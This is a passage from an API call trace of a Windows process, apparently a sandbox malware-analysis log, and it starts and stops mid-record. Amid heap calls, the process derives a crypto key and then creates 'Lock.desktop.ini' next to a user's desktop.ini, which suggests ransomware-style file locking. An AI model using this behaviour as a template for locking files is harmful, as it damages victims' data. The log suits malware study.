returned 1 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0269.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0269.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0269.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0269.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0269.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f40 | out: hHeap=0x970000) returned 1 [0269.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0269.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0269.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0269.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0269.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e52048 [0269.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e52048, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0269.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0269.182] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0269.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0269.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0269.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0269.182] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa875d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa872d0) returned 1 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0269.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0269.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52078 | out: hHeap=0x970000) returned 1 [0269.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0269.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.190] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0269.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0269.192] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.192] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.192] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b68 [0269.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0269.192] CryptDestroyHash (hHash=0xa875d0) returned 1 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0269.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0269.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0269.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0269.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0269.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0269.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.196] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0269.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0269.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0269.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.196] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures/desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0269.197] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0269.197] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0269.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0269.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0269.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0269.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0269.197] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0269.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0269.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0269.197] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0269.197] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0269.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0269.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0269.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0269.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0269.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0269.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0269.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0269.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0269.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.198] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures/" (normalized: "c:\\users\\public\\pictures")) returned 0x11 [0269.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0269.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0269.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0269.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0269.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0269.199] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures/Lock.desktop.ini" (normalized: "c:\\users\\public\\pictures\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0269.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0269.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0269.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0269.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0269.199] HeapFree (in: 